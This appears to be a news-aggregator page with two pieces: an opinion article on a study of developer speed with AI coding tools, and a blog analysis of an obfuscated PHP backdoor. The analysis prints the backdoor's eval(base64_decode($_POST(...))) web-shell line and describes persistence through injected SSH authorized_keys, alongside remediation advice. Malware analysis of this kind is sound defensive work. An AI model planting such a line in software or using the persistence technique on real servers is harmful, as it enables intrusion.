DAILY NEWS

Stay Ahead, Stay Informed – Every Day

Advertisement
Experienced devs are slower with AI tools. Nobody wants to admit it.



A recent study discovered that experienced open-source developers were 19% slower while using AI coding assistants. However, those same developers indicated themselves to believe that they were 20% faster.

Read it and weep: the disconnect between perception and reality is nearing 40 percentage points.

Why This Should Bother You

This wasn’t just any survey. It compared real task completion times with self-reported productivity. And the senior engineers – the ones we trust to make all the big architectural decisions – were certainly, but inaccurately, confident about their speed.

And the industry is building its entire tooling strategy around the opposite assumption.

The Perception Trap

I have a hypothesis to explain this phenomenon. As a senior dev, you have a lot of cognitive load taken up by context-switching costs that you are not aware of.

You prompt the AI. You read the output. You notice it got the abstraction wrong. You fix it. You re-prompt. You read again. You realize it missed an edge case you would have caught on line three. You fix that too.

Every single step appears to be helping. There is less typing on your part. More code on the screen. More dopamine. But wall-clock time, in total? It takes longer to finish the task.

→ AI output creates an illusion of velocity because characters appear fast→ Senior devs spend more time reviewing and correcting than they realize→ The cognitive load of evaluating generated code is real work that doesn’t feel like work

Who Actually Benefits?

This is not meant to be anti-AI. It’s a more nuanced perspective.

AI assistants are genuinely helpful when you are learning a new language or framework. They save you real minutes when you’re writing the boilerplate for the hundredth time. They are a decent starting point when you’re working with an unfamiliar API.

However, if you are familiar with the codebase, already understand the patterns, and can type as fast as you think? The AI is essentially adding an intermediary layer between your brain and the editor. This intermediary has a downside.

The study indicates that for skilled developers, the cost is about 19%. This is almost a full day per week.

The Industry Doesn’t Want to Hear This

A discussion with over 800 comments from experienced developers erupted about these findings. Reactions were polarized, but revealing. A lot of senior engineers acknowledged they had sensed this friction, but had assumed they were an outlier.

They were not the outlier. They were the average.

Meanwhile, every company is mandating AI tool adoption. Each job advertisement includes Copilot. Every engineering blog is publishing “how we 10x’d with AI” stories. The incentive structure punishes anyone who says “actually, this is slowing me down.”

Nobody wants to be the person who looks like they can’t adapt. Hence, everybody agrees and nods along to things. 🤷

What I Think We Should Do

Stop treating AI coding assistants as universally beneficial. Start treating them like any other tool — useful in specific contexts, counterproductive in others.

→ Measure actual output, not vibes→ Let senior engineers opt out without stigma→ Stop conflating “uses AI tools” with “is a modern developer”

The best developers I know are ruthless about removing friction from their workflow. If a tool becomes a hindrance, they eliminate it. We need to allow them to do so.

I have a question for you: Have you ever turned off Copilot or another similar tool and felt quicker than before, but you were too embarrassed to tell your team?



Source link

How I Discovered and Deobfuscated a Hidden PHP Backdoor on My Server


As developers and system architects, we often secure our code but neglect the silent threats lurking in old directories or clever obfuscations. Recently, I caught a stealthy PHP backdoor ((random_name).php) embedded in a system.

Instead of just deleting it, I decided to perform a full reverse engineering to understand exactly how it works, how it bypasses scanners, and how it maintains persistence on a server.

Here is a quick summary of what I found during the analysis.

🔍 The Anatomy of the MalwareAt first glance, the file was heavily obfuscated using multiple layers of encoding to look like harmless gibberish. However, the core mechanism relied on a classic but dangerous pattern:

PHP// The malicious pattern used to execute hidden codeeval(base64_decode($_POST(‘encoded_payload’)));Key Techniques Used by the Attacker:Layered Obfuscation: The code utilized deep base64 nesting combined with string manipulation functions to evade signature-based security scanners.

Hidden Tar Extraction: Deep inside the encoded strings, the malware contained a compressed TAR structure. Once triggered, it extracts a full-featured web shell into the server directories.

SSH Persistence: The ultimate goal wasn’t just to execute commands once—the script was designed to inject malicious public keys into the server’s ~/.ssh/authorized_keys file, granting the attacker permanent, direct SSH access without leaving a footprint in the web logs.

🛠️ How to Protect Your SystemIf you suspect your server has been compromised, simply deleting the .php file might not be enough. You need to:

Check your ~/.ssh/authorized_keys for unauthorized entries.

Audit your system cronjobs to ensure the malware doesn’t have a re-infection script scheduled.

Implement strict file permissions (chmod 644 for files, 755 for directories) and disable dangerous PHP functions like eval(), exec(), and passthru() in your php.ini.

📖 Read the Full Deep DiveI have documented the complete step-by-step deobfuscation process, the code breakdown, directory structures, and full remediation steps on GitHub.

👉 See full analysis and source code breakdown here:

https://github.com/KhaiTrang1995/Malware-Analysis-Reports-PHP-Backdoor

Alternatively, you can view the repository directly:

Tags: #php #security #devsecops #malware



Source link